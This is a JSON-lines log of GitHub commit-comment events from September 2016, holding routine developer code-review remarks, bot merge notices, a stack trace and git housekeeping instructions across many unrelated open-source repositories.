{"id":"4552075899","type":"CommitCommentEvent","actor":{"login":"adellibovi"},"repo":{"name":"odigeoteam/TableViewKit"},"payload":{"comment":{"id":18992176,"position":null,"line":null,"path":null,"commit_id":"5a7f122f3695507a247f82e7d418e0bdda6140f1","created_at":"2016-09-12T21:41:56Z","updated_at":"2016-09-12T21:41:56Z","body":"Fixes #4"}},"created_at":"2016-09-12T21:41:56Z"}
{"id":"4552076225","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18992178,"position":null,"line":null,"path":null,"commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T21:42:00Z","updated_at":"2016-09-12T21:42:00Z","body":"there's def. something off with the stats though"}},"created_at":"2016-09-12T21:42:00Z"}
{"id":"4552078163","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/all"},"payload":{"comment":{"id":18992185,"position":null,"line":null,"path":null,"commit_id":"11e1389ccadd24baf02e0277e8cd942a3c0ed5d3","created_at":"2016-09-12T21:42:23Z","updated_at":"2016-09-12T21:42:23Z","body":"I purged this commit, please reset to new HEAD:\r\n```\r\ngit fetch origin\r\ngit reset --hard origin/master\r\n```"}},"created_at":"2016-09-12T21:42:23Z"}
{"id":"4552080453","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/all"},"payload":{"comment":{"id":18992193,"position":null,"line":null,"path":null,"commit_id":"11e1389ccadd24baf02e0277e8cd942a3c0ed5d3","created_at":"2016-09-12T21:42:50Z","updated_at":"2016-09-12T21:42:50Z","body":"@opengapps/packagers \r\n\r\nI purged this commit, please reset to new HEAD:\r\n```\r\ngit fetch origin\r\ngit reset --hard origin/master\r\n```"}},"created_at":"2016-09-12T21:42:50Z"}
{"id":"4552084449","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"newluck77/fprsmap"},"payload":{"comment":{"id":18992202,"position":17,"line":37,"path":"js/main.js","commit_id":"4ae223217032e27f161ed16ce2cb0010068753b5","created_at":"2016-09-12T21:43:39Z","updated_at":"2016-09-12T21:43:39Z","body":"The result of the examples is a number; the result of my code is an object. But it is the same flow, :)"}},"created_at":"2016-09-12T21:43:39Z"}
{"id":"4552084906","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/ports"},"payload":{"comment":{"id":18992206,"position":null,"line":null,"path":null,"commit_id":"1825f6f680bf3259a0bd5f25dc6ad7d24c3d1b9c","created_at":"2016-09-12T21:43:45Z","updated_at":"2016-09-12T21:43:45Z","body":"As long as running the non-existent script fails in the PAM auth path it's perfectly safe to move it. I don't expect the PAM bits to change anymore (or at least not a lot).\n\nWith the next -devel we can tie in the PAM package as a core.git dependency and then restructure the remaining code.\n\n> On 12.09.2016, at 18:30, Ad Schellevis <notifications@github.com> wrote:\n> \n> @fichtner I was a bit in doubt about this one, because of the hard-coded dependency, although I agree that extending from core.git is more practical. I'll move it to core.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-12T21:43:45Z"}
{"id":"4552088017","type":"CommitCommentEvent","actor":{"login":"domien96"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18992215,"position":null,"line":null,"path":null,"commit_id":"4a596d3e90ff44aba8fd792608243e3b50be0b39","created_at":"2016-09-12T21:44:20Z","updated_at":"2016-09-12T21:44:20Z","body":"ingewikkelderre methodes, is dat in de zin van complexiteit van het\nalgoritme?\nZoja lijkt mij dat wel goe om eerst te beginnen met de easy ones.\nEn maxiteraties zal ik dan laten staan en zal dim^2 blijven.\n\nOp 12 september 2016 22:51 schreef GrigoriLomonosov <\nnotifications@github.com>:\n\n> een int die gelijk is aan de som van de returns van die 3 methodes en\n> kijken of dat 3 is, als het 3 is stoppen. Dan heb je enkel de lussen in die\n> 3 methodes en niet de lussen in isEmpty, wat dim^2 iteraties minder is per\n> stap in de while. Op het einde van alle functies kan je dan controleren of\n> het is opgelost.\n>\n> Dit zijn ook de 3 simpelste methodes en ik heb geprobeerd om elk vakje +-\n> maar 1 keer te overlopen (die 3 methodes hebben enkel een dubbele for). Ik\n> zou dus telkens die 3 laten lopen tot ze vast zitten, dan een ingewikkelde\n> methode(eliminate_impossible_other_combos,...) en als de ingewikkelde\n> iets veranderd hebben, terug met de simpele beginnen. En als ze allemaal\n> niet meer zorgen (of een max aantal iteraties is overschreden) dan\n> controleren met hasEmpty.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GrigoriLomonosov/BinaryPuzzleSolver/commit/4a596d3e90ff44aba8fd792608243e3b50be0b39#commitcomment-18991498>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJgnKzIQhmxG-wE7HZ62F-m0PHAxx8mDks5qpbtRgaJpZM4J6Q-9>\n> .\n>\n\n\n\n-- \nMet vriendelijke Groet\nDomien.. :)\n"}},"created_at":"2016-09-12T21:44:20Z"}
{"id":"4552089158","type":"CommitCommentEvent","actor":{"login":"KyleFung"},"repo":{"name":"KyleFung/azkaban"},"payload":{"comment":{"id":18992218,"position":36,"line":120,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"a00cf2bc1789c119d8770ab80a962149a3469da4","created_at":"2016-09-12T21:44:34Z","updated_at":"2016-09-12T21:44:34Z","body":"Example output:\r\n{\r\n    \"status\": 500,\r\n    \"stackTrace\": \"com.linkedin.restli.server.RestLiServiceException [HTTP Status:500]: Error in application code\r\n\tat com.linkedin.restli.internal.server.RestLiMethodInvoker.doInvoke(RestLiMethodInvoker.java:243)\r\n\tat com.linkedin.restli.internal.server.RestLiMethodInvoker.invoke(RestLiMethodInvoker.java:141)\r\n\tat com.linkedin.restli.server.RestLiServer.handleResourceRequest(RestLiServer.java:286)\r\n\tat com.linkedin.restli.server.RestLiServer.doHandleRequest(RestLiServer.java:167)\r\n\tat com.linkedin.restli.server.BaseRestServer.handleRequest(BaseRestServer.java:56)\r\n\tat com.linkedin.restli.server.DelegatingTransportDispatcher.handleRestRequest(DelegatingTransportDispatcher.java:56)\r\n\tat com.linkedin.r2.transport.http.server.HttpDispatcher.handleRequest(HttpDispatcher.java:95)\r\n\tat com.linkedin.r2.transport.http.server.AbstractR2Servlet.service(AbstractR2Servlet.java:124)\r\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:820)\r\n\tat com.linkedin.restli.server.RestliServlet.service(RestliServlet.java:139)\r\n\tat org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:511)\r\n\tat org.mortbay.jetty.servlet.ServletHandler.handle(ServletHandler.java:401)\r\n\tat org.mortbay.jetty.servlet.SessionHandler.handle(SessionHandler.java:182)\r\n\tat org.mortbay.jetty.handler.ContextHandler.handle(ContextHandler.java:766)\r\n\tat org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)\r\n\tat org.mortbay.jetty.Server.handle(Server.java:326)\r\n\tat org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)\r\n\tat org.mortbay.jetty.HttpConnection$RequestHandler.content(HttpConnection.java:945)\r\n\tat org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:756)\r\n\tat org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:218)\r\n\tat org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)\r\n\tat org.mortbay.jetty.bio.SocketConnector$Connection.run(SocketConnector.java:228)\r\n\tat org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)\r\nCaused by: azkaban.project.ProjectManagerException: Validator <Validator Name> Project Validator reports errors: Zip file contains blacklisted file /command.job, and the reason is because I said so<br>\r\n\tat azkaban.restli.ProjectManagerResource.deploy(ProjectManagerResource.java:120)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:498)\r\n\tat com.linkedin.restli.internal.server.RestLiMethodInvoker.doInvoke(RestLiMethodInvoker.java:186)\r\n\t... 22 more\r\n\",\r\n    \"message\": \"Error in application code\",\r\n    \"exceptionClass\": \"com.linkedin.restli.server.RestLiServiceException\"\r\n}\r\n\r\nWith this patch, the return code is 500, but it should be 400. Investigating a fix for that right now."}},"created_at":"2016-09-12T21:44:34Z"}
{"id":"4552089845","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18992219,"position":null,"line":null,"path":null,"commit_id":"b73353e8f68971137248db0961e0b1fa324806b0","created_at":"2016-09-12T21:44:42Z","updated_at":"2016-09-12T21:44:42Z","body":"this file for mac `.dmg` is a very small one, and the `stats` has a delay of `500ms`. Maybe that's the reason"}},"created_at":"2016-09-12T21:44:42Z"}
{"id":"4552090505","type":"CommitCommentEvent","actor":{"login":"Doug0855"},"repo":{"name":"Doug0855/project_2"},"payload":{"comment":{"id":18992222,"position":null,"line":null,"path":null,"commit_id":"e6aca70145cb44b7d527cf48036761cb27853548","created_at":"2016-09-12T21:44:51Z","updated_at":"2016-09-12T21:44:51Z","body":"Finalized Changes"}},"created_at":"2016-09-12T21:44:51Z"}
{"id":"4552094451","type":"CommitCommentEvent","actor":{"login":"sharynneazhar"},"repo":{"name":"sharynneazhar/eecs448-calendar"},"payload":{"comment":{"id":18992230,"position":null,"line":null,"path":null,"commit_id":"c26ac9b8bf6dd7fa6a2228a38c2a2e234e9514f0","created_at":"2016-09-12T21:45:38Z","updated_at":"2016-09-12T21:45:38Z","body":"@erincoots refactored how the button works. Let me know what you think. If the other way was better, we can scrap this 😜 "}},"created_at":"2016-09-12T21:45:38Z"}
{"id":"4552094607","type":"CommitCommentEvent","actor":{"login":"newluck77"},"repo":{"name":"newluck77/fprsmap"},"payload":{"comment":{"id":18992233,"position":17,"line":37,"path":"js/main.js","commit_id":"4ae223217032e27f161ed16ce2cb0010068753b5","created_at":"2016-09-12T21:45:40Z","updated_at":"2016-09-12T21:45:40Z","body":"I think I do already! :D Hey, I even found the mistake in your explanation! :D "}},"created_at":"2016-09-12T21:45:40Z"}
{"id":"4552096890","type":"CommitCommentEvent","actor":{"login":"zaps166"},"repo":{"name":"reagentoo/gentoo-overlay"},"payload":{"comment":{"id":18992240,"position":null,"line":null,"path":null,"commit_id":"7c26fe65704af197d6ff984683933ead243dccb6","created_at":"2016-09-12T21:46:09Z","updated_at":"2016-09-12T21:46:09Z","body":"> Also, please tell me, it is possible to use QMPlay2 without libFFmpeg.so module?\r\n\r\nYes, it is possible, but QMPlay2 will be limited to playback:\r\n- Audio CD (libcdio),\r\n- MOD (built-in libmodplug),\r\n- chiptunes (sidplayfp and game-music-emu),\r\n- generate sine,\r\n- play raw PCM files (needs to manually set samplerate, etc.),\r\n- play Rayman2 music.\r\n\r\n---\r\n\r\nAlso QMPlay2 (libqmplay2.so) uses FFmpeg for networking (e.g. new `Http` class) and some other features like reference-counted buffers and other utilities. Currently `libFFmpeg.so` has part of networking in QMPlay2 (`FFReader` class), so e.g. Downloader module won't work (I want to move it into `libqmplay2.so` soon).\r\n\r\n---\r\n\r\n> As audio player only, for example\r\n\r\nFFmpeg supports all(?) audio codecs and it supports audio containers, so it is great tool to use it also for audio player. FFmpeg decoders are better than native decoders (e.g. Vorbis decoder in FFmpeg is much that `libvorbis`). It also provides common API for every audio/video codec.\r\n\r\n---\r\n\r\nDisabling `libFFmpeg.so` module won't remove FFmpeg dependency - it will only limit features, so IMHO it should be always enabled :)"}},"created_at":"2016-09-12T21:46:09Z"}
{"id":"4552097136","type":"CommitCommentEvent","actor":{"login":"MattGal"},"repo":{"name":"crummel/dotnet_buildtools"},"payload":{"comment":{"id":18992241,"position":null,"line":null,"path":null,"commit_id":"60b7f3e073aff40e6d46ed25be2afdc5d618c08c","created_at":"2016-09-12T21:46:12Z","updated_at":"2016-09-12T21:46:12Z","body":"Can you fix the part that results in this ouptu @ the same time?\r\nERROR LOG:\r\n  **Args: System.String[]**\r\n  testCasesToRun: 31"}},"created_at":"2016-09-12T21:46:12Z"}
{"id":"4552098543","type":"CommitCommentEvent","actor":{"login":"ekg"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":18992244,"position":null,"line":null,"path":null,"commit_id":"9d4cb57b9cbd14ed9be8097fe41a77d5a488d9f5","created_at":"2016-09-12T21:46:27Z","updated_at":"2016-09-12T21:46:27Z","body":"Yeah this looks like a problem. Sorry I thought I had dealt with it but\ndidn't loop back to deal with it as there had been only one thing using\nthis function until recently.\n\nYou can turn the unrolling code on by default to work around this. I will\nlook into fixing the DFS stuff tomorrow.\n\nOn Mon, Sep 12, 2016, 23:22 adamnovak <notifications@github.com> wrote:\n\n> @ekg <https://github.com/ekg> what does a DFS mean on Node*s and not\n> NodeTraversals? This looks to be just following all the edges in a\n> from->to direction, irrespective of whether those edges are actually\n> attached to the start or end of the node. So you can start at a node and\n> eventually reach nodes that you can't thread a proper\n> alternating-nodes-and-edges path to.\n>\n> There's also the case where a node that is topologically upstream gets\n> visited later, because the root loop got to one of its children first.\n>\n> I think this dfs thing is the root cause of a problem I'm having with\n> is_acyclic, where it thinks that a graph with a cycle between two nodes of\n> a normal from->to edge and a from_start, to_end edge is acyclic, depending\n> on the ID order of the nodes.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vgteam/vg/commit/9d4cb57b9cbd14ed9be8097fe41a77d5a488d9f5#commitcomment-18991885>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAI4EfojhYYl1ZY9aDV9zAzKD59f3mg1ks5qpcKNgaJpZM4J7C69>\n> .\n>\n"}},"created_at":"2016-09-12T21:46:27Z"}
{"id":"4552099044","type":"CommitCommentEvent","actor":{"login":"shiznix"},"repo":{"name":"shiznix/unity-gentoo"},"payload":{"comment":{"id":18992246,"position":null,"line":null,"path":null,"commit_id":"ac1208b712cd141b0f8064e741072541f0613870","created_at":"2016-09-12T21:46:33Z","updated_at":"2016-09-12T21:46:33Z","body":"It should replace it.\r\nIn this case it was easier to manually make those small paccept_keywords changes and clean up stable packages from paccept_keywords at the same time, rather than merge the pull request."}},"created_at":"2016-09-12T21:46:33Z"}
{"id":"4552100312","type":"CommitCommentEvent","actor":{"login":"KyleFung"},"repo":{"name":"KyleFung/azkaban"},"payload":{"comment":{"id":18992247,"position":31,"line":115,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"a00cf2bc1789c119d8770ab80a962149a3469da4","created_at":"2016-09-12T21:46:48Z","updated_at":"2016-09-12T21:46:48Z","body":"Multiple errors would just be concatenated one after the other on the same line. I believe they should be separated by new lines, and will add them in the next revision."}},"created_at":"2016-09-12T21:46:48Z"}
{"id":"4552101201","type":"CommitCommentEvent","actor":{"login":"bunder2015"},"repo":{"name":"zfsonlinux/zfs"},"payload":{"comment":{"id":18992249,"position":null,"line":null,"path":null,"commit_id":"1f734a62ac8f8b9bb3b6e3ad5397fc94f205c0f6","created_at":"2016-09-12T21:46:59Z","updated_at":"2016-09-12T21:46:59Z","body":"@ggzengel https://github.com/zfsonlinux/zfs/pull/4833#issuecomment-244232422\r\nhttps://github.com/nedbass/zfs/commit/3a8e13688b4ee8c1799edb6484943eae5ea90dd2"}},"created_at":"2016-09-12T21:46:59Z"}
{"id":"4552103597","type":"CommitCommentEvent","actor":{"login":"basdelfos"},"repo":{"name":"basdelfos/beta-osd-v2"},"payload":{"comment":{"id":18992258,"position":null,"line":null,"path":null,"commit_id":"bed1c1c80258fbaefbf1c5d035753aa4146ac966","created_at":"2016-09-12T21:47:28Z","updated_at":"2016-09-12T21:47:28Z","body":"Are you sure you downloaded the latest development branch? This is what I have when I build the latest BETAFLIGHT target.\r\n\r\n![img_0470](https://cloud.githubusercontent.com/assets/334779/18454182/3a59e028-7943-11e6-99bd-6797b49d5e7f.jpg)\r\n\r\n\r\n"}},"created_at":"2016-09-12T21:47:28Z"}
{"id":"4552116188","type":"CommitCommentEvent","actor":{"login":"anilkumar769"},"repo":{"name":"anilkumar769/myproject"},"payload":{"comment":{"id":18992288,"position":null,"line":null,"path":null,"commit_id":"24b8125be27be6b540f5a727c2e9586ff2fde8e4","created_at":"2016-09-12T21:49:45Z","updated_at":"2016-09-12T21:49:45Z","body":"ASP.NET Project"}},"created_at":"2016-09-12T21:49:45Z"}
{"id":"4552116752","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/aosp_build"},"payload":{"comment":{"id":18992294,"position":null,"line":null,"path":null,"commit_id":"31a994231ef16a73cc1af7611d9aedf2af6e3305","created_at":"2016-09-12T21:49:51Z","updated_at":"2016-09-12T21:49:51Z","body":"Well, the chain is even more complicated, that is also what I had written that as comments in the suggestion at the time:\r\n\r\narm: all+arm\r\narm64: all+arm+arm64\r\nx86: all+arm+x86\r\nx86_64: all+arm+x86+x86_64"}},"created_at":"2016-09-12T21:49:51Z"}
{"id":"4552117169","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18992295,"position":null,"line":null,"path":null,"commit_id":"0e6bb3e3e5983d88a9cf0efc9a22ea6f17af9395","created_at":"2016-09-12T21:49:56Z","updated_at":"2016-09-12T21:49:56Z","body":"fast-forwarding develop-2.2 to borshop-integration-1473-feature-bjs-aae-hashing-v0 = 222447c0"}},"created_at":"2016-09-12T21:49:56Z"}
{"id":"4552119674","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18992306,"position":5,"line":18,"path":"src/main/kotlin/org/rust/lang/core/psi/impl/RustStubbedElementImpl.kt","commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-12T21:50:24Z","updated_at":"2016-09-12T21:50:24Z","body":"https://github.com/intellij-rust/intellij-rust/commit/8f02d6b5ab4756941cfcc636160dd540975eb54e#diff-c8b2ad7f47abb591654e27ec9994affdR44 <- this is the test that show that previous implementation was broken. \r\n\r\nCurrent implementation is tested by it and by almost every other test, because `getParent`now behaves identivally for stub and AST backed PSI."}},"created_at":"2016-09-12T21:50:24Z"}
{"id":"4552119992","type":"CommitCommentEvent","actor":{"login":"basdelfos"},"repo":{"name":"basdelfos/beta-osd-v2"},"payload":{"comment":{"id":18992308,"position":null,"line":null,"path":null,"commit_id":"bed1c1c80258fbaefbf1c5d035753aa4146ac966","created_at":"2016-09-12T21:50:27Z","updated_at":"2016-09-12T21:50:27Z","body":"This is the compiled hex build that I used.\r\n\r\n[firmware.hex.zip](https://github.com/basdelfos/beta-osd-v2/files/468427/firmware.hex.zip)\r\n"}},"created_at":"2016-09-12T21:50:27Z"}
{"id":"4552120060","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18992309,"position":null,"line":null,"path":null,"commit_id":"b29e85bf5ad558827d742631f5891c53b7f1b8e6","created_at":"2016-09-12T21:50:28Z","updated_at":"2016-09-12T21:50:28Z","body":"saw approval from nickelization\nat https://github.com/basho/yokozuna/commit/b29e85bf5ad558827d742631f5891c53b7f1b8e6"}},"created_at":"2016-09-12T21:50:28Z"}
{"id":"4552120099","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18992310,"position":null,"line":null,"path":null,"commit_id":"b29e85bf5ad558827d742631f5891c53b7f1b8e6","created_at":"2016-09-12T21:50:28Z","updated_at":"2016-09-12T21:50:28Z","body":"merging basho/yokozuna/bjs-feature-aae-hash-vclock = b29e85bf into borshop-integration-655-bjs-feature-aae-hash-vclock"}},"created_at":"2016-09-12T21:50:28Z"}
{"id":"4552120128","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18992311,"position":null,"line":null,"path":null,"commit_id":"b29e85bf5ad558827d742631f5891c53b7f1b8e6","created_at":"2016-09-12T21:50:29Z","updated_at":"2016-09-12T21:50:29Z","body":"basho/yokozuna/bjs-feature-aae-hash-vclock = b29e85bf merged ok, testing candidate = 6f3d20cb"}},"created_at":"2016-09-12T21:50:29Z"}
{"id":"4552120259","type":"CommitCommentEvent","actor":{"login":"ifsnop"},"repo":{"name":"jeichorn/mysqldump-php"},"payload":{"comment":{"id":18992312,"position":null,"line":null,"path":null,"commit_id":"a80c0427cbbd61b92cf9ad3b0250a1059a1c3b33","created_at":"2016-09-12T21:50:30Z","updated_at":"2016-09-12T21:50:30Z","body":"Do you have any speed test, so I could  see a performance improvement? Could this by merged into mainline by using a switch? Original mysqldump doesn't have this option, an instead forces to use the exclude-tables switch."}},"created_at":"2016-09-12T21:50:30Z"}
{"id":"4552121014","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/apkcrawler"},"payload":{"comment":{"id":18992318,"position":17,"line":113,"path":"playstorecrawler.py","commit_id":"3bc229f985d350bc1491ecfc3ef9dc768a51bef7","created_at":"2016-09-12T21:50:39Z","updated_at":"2016-09-12T21:50:39Z","body":"shouldn't we declare this somewhere more global?"}},"created_at":"2016-09-12T21:50:39Z"}
{"id":"4552122910","type":"CommitCommentEvent","actor":{"login":"itzg"},"repo":{"name":"itzg/titan-browser"},"payload":{"comment":{"id":18992324,"position":null,"line":null,"path":null,"commit_id":"3694fa150b080e97d825c9bc504d6fc67c78bbfd","created_at":"2016-09-12T21:51:01Z","updated_at":"2016-09-12T21:51:01Z","body":"For #6 and #7 "}},"created_at":"2016-09-12T21:51:01Z"}
{"id":"4552123562","type":"CommitCommentEvent","actor":{"login":"crummel"},"repo":{"name":"crummel/dotnet_buildtools"},"payload":{"comment":{"id":18992327,"position":null,"line":null,"path":null,"commit_id":"60b7f3e073aff40e6d46ed25be2afdc5d618c08c","created_at":"2016-09-12T21:51:10Z","updated_at":"2016-09-12T21:51:10Z","body":"Good catch, I'll fix that in the UWP app."}},"created_at":"2016-09-12T21:51:10Z"}
{"id":"4552125802","type":"CommitCommentEvent","actor":{"login":"gbrova"},"repo":{"name":"palantir/atlasdb"},"payload":{"comment":{"id":18992329,"position":13,"line":33,"path":"atlasdb-client/src/main/java/com/palantir/atlasdb/transaction/impl/AbstractTransactionManager.java","commit_id":"cfa4881bd6e7e7ce9df441d7c1960510dae0db14","created_at":"2016-09-12T21:51:35Z","updated_at":"2016-09-12T21:51:35Z","body":"Cool! \r\n\r\nCan we add a unit test for this?"}},"created_at":"2016-09-12T21:51:35Z"}
{"id":"4552126215","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/apkcrawler"},"payload":{"comment":{"id":18992331,"position":5,"line":173,"path":"googleplayapi/googleplay.py","commit_id":"a0987cc1a61c611eaf7af2dc34ba9137ef1d3a3c","created_at":"2016-09-12T21:51:39Z","updated_at":"2016-09-12T21:51:39Z","body":"or 24 as default now?"}},"created_at":"2016-09-12T21:51:39Z"}
{"id":"4552128522","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"generate/generate-defaults"},"payload":{"comment":{"id":18992334,"position":null,"line":null,"path":null,"commit_id":"27dec5408ce4a6c44c076403204b3e33879e26ed","created_at":"2016-09-12T21:52:08Z","updated_at":"2016-09-12T21:52:08Z","body":"Strange fix, really. We won't have git data in our templates now?"}},"created_at":"2016-09-12T21:52:08Z"}
{"id":"4552131384","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18992342,"position":null,"line":null,"path":null,"commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-12T21:52:40Z","updated_at":"2016-09-12T21:52:40Z","body":">Is it the other way in < 2016.2?\r\n\r\nHm, looks like some of my comments disappeared from here somehow...\r\n\r\n\r\n>Please be careful when using this method and use it only in the described case, because if there are AST-only elements in the hierarchy, it'll return different results depending on whether this element is stub-based or has already been switched to PSI.\r\n\r\nThis was the problem with `parentByStub`. "}},"created_at":"2016-09-12T21:52:40Z"}
{"id":"4552131536","type":"CommitCommentEvent","actor":{"login":"alexeykudinkin"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18992343,"position":5,"line":18,"path":"src/main/kotlin/org/rust/lang/core/psi/impl/RustStubbedElementImpl.kt","commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-12T21:52:42Z","updated_at":"2016-09-12T21:52:42Z","body":"It doesn't, i switch here to `parentByStub` and it still passes."}},"created_at":"2016-09-12T21:52:42Z"}
{"id":"4552133271","type":"CommitCommentEvent","actor":{"login":"navsan"},"repo":{"name":"apache/incubator-quickstep"},"payload":{"comment":{"id":18992347,"position":null,"line":null,"path":null,"commit_id":"cc479336efde3e576077d9a9821a161a2b1878a2","created_at":"2016-09-12T21:53:02Z","updated_at":"2016-09-12T21:53:02Z","body":"No there's a more recent one. Look for col_vec_opt or something.\n\nOn Mon, Sep 12, 2016, 16:21 Marc S <notifications@github.com> wrote:\n\n> @navsan <https://github.com/navsan> this is the correct branch to work\n> off of, correct?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apache/incubator-quickstep/commit/cc479336efde3e576077d9a9821a161a2b1878a2#commitcomment-18991876>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACZB66prRtoJW9rCfqiK31SEYaUr7ihlks5qpcJjgaJpZM4J7C4O>\n> .\n>\n"}},"created_at":"2016-09-12T21:53:02Z"}
{"id":"4552139154","type":"CommitCommentEvent","actor":{"login":"daviddarnes"},"repo":{"name":"anchorcms/anchor-cms"},"payload":{"comment":{"id":18992352,"position":null,"line":null,"path":null,"commit_id":"82f20d39ab29c30cbb8c9f593b9bb74a83330969","created_at":"2016-09-12T21:54:09Z","updated_at":"2016-09-12T21:54:09Z","body":"@jaseonline you'll need to fork the repo in order to contribute. Fork the repo to your own account, make the changes you make, then open a pull request back to this repo to propose your changes. You can [find out more here](https://guides.github.com/activities/contributing-to-open-source/)"}},"created_at":"2016-09-12T21:54:09Z"}
{"id":"4552139741","type":"CommitCommentEvent","actor":{"login":"ChronoMonochrome"},"repo":{"name":"ChronoMonochrome/Chrono_Kernel-1"},"payload":{"comment":{"id":18992353,"position":5,"line":715,"path":"arch/arm/configs/codina_defconfig","commit_id":"f561c5d71dd58e5bc273b0b5fd04a3d92a81b4f2","created_at":"2016-09-12T21:54:15Z","updated_at":"2016-09-12T21:54:15Z","body":"Required by app TTL editor for users of those ISP that prevents the Internet tethering. "}},"created_at":"2016-09-12T21:54:15Z"}
{"id":"4552140220","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18992355,"position":null,"line":null,"path":null,"commit_id":"62a945b2ff7dd02bdfe849d79dd7c2f4898653e9","created_at":"2016-09-12T21:54:21Z","updated_at":"2016-09-12T21:54:21Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n"}},"created_at":"2016-09-12T21:54:21Z"}
{"id":"4552146290","type":"CommitCommentEvent","actor":{"login":"rachitnigam"},"repo":{"name":"plasma-umass/Rehearsal"},"payload":{"comment":{"id":18992368,"position":null,"line":null,"path":null,"commit_id":"3c199fe86a654a15350b38f1caaddbff92c977be","created_at":"2016-09-12T21:55:32Z","updated_at":"2016-09-12T21:55:32Z","body":"@arjunguha Where did you find about this thing? (Just for future reference as things to look into)."}},"created_at":"2016-09-12T21:55:32Z"}
{"id":"4552151077","type":"CommitCommentEvent","actor":{"login":"luisdalmolin"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18992376,"position":null,"line":null,"path":null,"commit_id":"e6063d7df79aa6bbc3829dcc0b3907fe8b49201c","created_at":"2016-09-12T21:56:28Z","updated_at":"2016-09-12T21:56:28Z","body":"Thanks for that!"}},"created_at":"2016-09-12T21:56:28Z"}
{"id":"4552151527","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18992380,"position":5,"line":18,"path":"src/main/kotlin/org/rust/lang/core/psi/impl/RustStubbedElementImpl.kt","commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-12T21:56:35Z","updated_at":"2016-09-12T21:56:35Z","body":"Yep, this is the problem with the test: you have to whitelist explicitly the cases which are stub based. So `shouldImplementParentByStub` should be changed to always return `true` than. Hm, perhaps this could be avoided if I catch stub access exception? Will take a look tomorrow. "}},"created_at":"2016-09-12T21:56:35Z"}
{"id":"4552154172","type":"CommitCommentEvent","actor":{"login":"koppor"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":18992385,"position":null,"line":null,"path":null,"commit_id":"7d9c3dc1f01ef39ba25ea2b253ece1542f3f64f6","created_at":"2016-09-12T21:57:05Z","updated_at":"2016-09-12T21:57:05Z","body":"Currently short of time. Can someone (@Siedlerchr?) update https://github.com/JabRef/jabref/blob/master/.mailmap accordingly and rerun scripts/generate-authors.sh?"}},"created_at":"2016-09-12T21:57:05Z"}
